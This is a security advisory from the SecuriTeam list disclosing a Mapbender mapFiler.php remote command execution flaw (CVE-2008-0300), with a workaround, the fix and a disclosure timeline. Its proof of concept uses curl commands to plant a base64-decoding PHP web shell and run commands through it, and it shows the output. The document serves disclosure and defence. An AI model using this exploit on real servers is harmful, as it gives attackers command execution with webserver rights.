[UNIX] Mapbender Command Execution



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Mapbender Command Execution
------------------------------------------------------------------------


SUMMARY

" <http://www.mapbender.org> Mapbender is the software and portal site for
geodata management of OGC OWS architectures. The software provides web
technology for managing spatial data services implemented in PHP,
JavaScript and XML. It provides a data model and interfaces for
displaying, navigating and querying OGC compliant map services. The
Mapbender framework furthermore provides authentication and authorization
services, OWS proxy functionality, management interfaces for user, group
and service administration in WebGIS projects." During a penetration test
RedTeam Pentesting discovered a remote command execution vulnerability in
Mapbender. An unauthorized user can create arbitrary PHP-files on the
Mapbender webserver, which can later be executed.

DETAILS

The Mapbender software comes with a script mapFiler.php, which is located
at
http://www.example.com/tools/mapFiler.php

Due to the lack of input filtering, an attacker is able to enter valid PHP
code in the "factor" input field. This PHP code is written into a newly
generated file in the Mapbender webfolder. Therefore, it is possible to
remotely execute the code by requesting the new file.

Proof of Concept:
For this example, the user account which is used to execute php scripts
needs permissions to write files to the tmp directory. Any other directory
with write permissions in the web root can be used, too.

Calling

curl -d "myLocation=../tmp/.&factor=<?php passthru(base64_decode(
\$_GET[c])) ?>.php&button=let's go" http://www.example.com/
tools/mapFiler.php

creates a file

tmp/_\<\?php\ passthru\(base64_decode\(\$_GET\[c\]\)\)\ \?\>.php.

with the content:

#Modified by MapbenderTools
#Date: 14.01.2008
#Factor: <?php passthru(base64_decode($_GET[c])) ?>.php

This script can then be executed by calling:

curl -g 'http://www.example.com/tmp/_<%3fphp%20passthru(base64_decode(
$_GET[c]))%20%3f>.php.?c=aWQ'

It returns:

#Modified by MapbenderTools
#Date: 15.01.2008
#Factor: uid=33(www-data) gid=33(www-data) groups=33(www-data)
php

Commands sent to the script have to be base64 encoded and will be decoded
by the PHP code, to avoid possible URL filtering on the victim's side.

Workaround:
If not needed, the mapfiler.php script can be removed. Otherwise, it can
be protected by using an .htaccess directive.

Fix:
The vulnerability is fixed in release 2.4.5 rc1.

Security Risk:
The security risk is rated as high. An attacker can execute arbitrary
commands remotely with the rights of the webserver.

CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0300>
CVE-2008-0300

Disclosure Timeline:
2007-12-14 - Problem identified during a penetration test
2008-01-09 - Customer approves contacting of Mapbender developers
2008-01-17 - CVE number assigned
2008-03-10 - Vendor releases fixed version
2008-03-11 - Advisory released


ADDITIONAL INFORMATION

The information has been provided by
<mailto:release@xxxxxxxxxxxxxxxxxxxxx> RedTeam Pentesting GmbH.
The original article can be found at:
<http://www.redteam-pentesting.de/advisories/rt-sa-2008-001.php>
http://www.redteam-pentesting.de/advisories/rt-sa-2008-001.php



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • TSLSA-2005-0059 - multi
    ... Affected versions: Trustix Secure Linux 2.2 ... PHP is an HTML-embedded scripting language. ... use of Rest with FTP servers and Range with HTTP servers to retrieve files ... - New Upstream and Multiple Vendor Security Fixes ...
    (Bugtraq)
  • Re: Its COBOL, Jim, but not as we know it...
    ... ActiveX control has no more permissions on your system than a Java ... It is _you_ that has improved the security, ... MicroSoft system of signed authentication which is used by ActiveX controls. ... Microsoft email can automatically execute an attachment. ...
    (comp.lang.cobol)
  • [NEWS] DB2 on iSeries Stored Procedures Vulnerability
    ... Beyond Security would like to welcome Tiscali World Online ... This vulnerability lets an otherwise limited user execute iSeries ... This vulnerability lets a user execute REXX scripts. ... CL programs sources are kept in Source files. ...
    (Securiteam)
  • [Full-Disclosure] Flaws security feature of SP2
    ... Author: Jürgen Schmidt, heise Security ... Windows Explorer does not update zone information ... When a user tries to execute a file downloaded from the ... files from archives with a ZoneID greater than or equal ...
    (Full-Disclosure)
  • RE: [Full-Disclosure] Flaws security feature of SP2
    ... Flaws security feature of SP2 ... Windows Explorer does not update zone information ... When a user tries to execute a file downloaded from the ... files from archives with a ZoneID greater than or equal ...
    (Full-Disclosure)